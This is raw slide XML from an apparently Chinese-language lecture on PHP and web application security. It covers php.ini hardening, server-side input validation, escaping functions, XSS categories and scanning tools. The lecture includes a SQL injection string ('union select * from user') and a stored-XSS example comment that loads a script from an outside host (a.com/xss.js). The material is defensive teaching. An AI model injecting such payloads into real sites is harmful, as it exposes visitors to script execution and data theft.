              <a:t>，方便调试；正式环境置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，如需看错误信息，可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>log_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = On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dirty="0" err="1" smtClean="0"/>
              <a:t>log_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Off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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是否记录错误日志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  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dirty="0" err="1" smtClean="0"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Off  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>打开远程文件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allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Off  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包含远程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  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dirty="0" err="1" smtClean="0"/>
              <a:t>expose_php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = On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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防止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服务器泄露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的报告信息， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Off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头中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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及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配置安全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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会包含信息：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server: Apache/1.3.33 (Unix) PHP/5.0.3 mod_ssl/2.8.16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		OpenSSL/0.9.7c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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的版本信息不回被包含在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头中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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>open_basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 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对脚本操作路径进行限制，不受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>safe_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置的限制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>open_basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> =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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可访问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目录及其所有子目录，即使没有权限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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>safe_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = On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On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后，尝试读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>写入文件时，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将检查当前访问用户是否是该目标文件的所有者，如果不是则操作会被禁止。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受影响函数有：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da-DK" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRP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及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配置安全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	1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）、目录文件相关：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>chdir、move_uploaded_file、chgrp、parse_ini_file、chown、rmdir、copy、rename、fopen、require、highlight_file、show_source、include、symlink、link、touch、mkdir、unlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>		2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）、命令相关：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exec、shell_exec、passthru、system、popen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	3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）、环境设置相关：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>putenv、set_time_limit、set_include_path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	4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）、加载模块：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dl，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只能在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中配置加载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9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dirty="0" err="1" smtClean="0"/>
              <a:t>disable_functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>disable_classes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不受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>safe_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置的限制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多个函数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类用逗号隔开</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US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及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配置安全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10.1.2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户输入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上传 预处理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原则：永远不要相信用户输入的任何数据！！！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端的验证永远是不可靠的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用户可能自己会，或者是禁用客户端脚本的执行，从而跳过验证！必须要在服务器端验证！！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、不使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$_SERVER['HTTP_REFERER']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个超级变量检查数据来源，很菜很菜的黑客随便用个工具都可以伪造的。尽可能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>md5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rand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数产生令牌，验证令牌是否匹配。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、同样在使用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提交数据时也可使用上一条的令牌方式进行验证。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、程序中经常使用的方法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strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>删除所有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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt; &gt; ; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符进行转义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htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对所有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标签进行转义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、跨站脚本攻击（XSS）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1.2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"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dirty="0" smtClean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.2.1 Stored XSS Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>风险代码先被持久存储于服务器上（通常是数据库中），最后再显示在动态生成的HTML画面上。特点：恶意代码可以在数据库中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>找到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lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>.2.2 Reflected XSS Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>风险代码并没有被存储，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>而是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>通过解析URL参数，直接显示在最终的HTML画面上。特点：该类攻击可传递（通常以HTML格式的EMail传递给用户，并诱导其点击链接），恶意代码可以在生成的HTML代码中发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr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716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及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配置安全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10.1.3  DB SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>预处理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前提：连接数据库的账号不能是超级管理员账号或拥有超级权限的账号，这样可以做到破坏程度与程序能控制的范围一样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dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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dirty="0" err="1" smtClean="0"/>
              <a:t>sql_inject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注入）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	select filed1,filed2 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tbl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where cid='$cid' order by $order limit $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>limit,$offset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类似这种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也可以有注入的方法：当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cid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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>union select * from user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时，必须要严格检查用户输入的数据，并确保为合法数据类型。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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ctype_digit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>settype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等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安全检测工具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Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1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系统漏洞扫描与分析软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>是一款针对大型网络的端口扫描工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> Web Vulnerability Scanner</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>漏洞扫描程序，它可以检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>应用程序中的漏洞，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>注入、跨站脚本攻击、身份验证页上的弱口令长度等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Pangolin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    Pangolin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>是一款帮助渗透测试人员进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>注入测试的安全工具。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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input &lt;hidden&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>危险的存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> &lt;span class="f-l"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>新密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>b&gt;*&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;input type="hidden" name="uid" value="$!{uid}"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>input name="pwd" id="userPwd" type="password" value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>                    &lt;span class="validatorInfo"&gt;&lt;label for="new_password"&gt;&lt;/label&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>                &lt;/p&gt;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569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、跨站脚本攻击（XSS）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zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>.2.3 DOM Based XSS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zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>此种方式与Reflected XSS Attacks，区别在于插入恶意代码是Web应用返回的JavaScript执行的，而不是服务器端脚本语言（JSP、PHP、ASP等）。特点：无法在生成的HTML中找到恶意代码，只能依靠运行时前端画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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三者差别对比图</a:t>
            </a:r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13359"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611560" y="3717032"/>
          <a:ext cx="63409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3"/>
                <a:gridCol w="835343"/>
                <a:gridCol w="1329138"/>
                <a:gridCol w="1728192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风险代码存在于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>?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数据库中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HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>响应中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浏览器构建的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>DOM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>中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Stored XSS Attacks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是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Reflected XSS Attacks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是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DOM Based XSS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是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64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、跨站脚本攻击（XSS）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>流程示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>：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endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（1）攻击者A发现某博客系统B对博文评论未做安全检查、且显示时未做转义，即允许注入JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（2）攻击者A向某访问量大的博文发表以下评论</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>&lt;script src="http://a.com/xss.js"&gt;&lt;/script&gt;楼主帖子文笔流畅，修辞得体，深得魏晋诸朝遗风，更.....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>.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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>3）博客系统B使用以下语法显示评论（JSP语法示例）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>评论内容：&lt;%= comment.content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>%&gt;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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>4）后果，每个该评论的阅读者都将成为受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。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更多的攻击方式请参考</a:t>
            </a:r>
            <a:r>
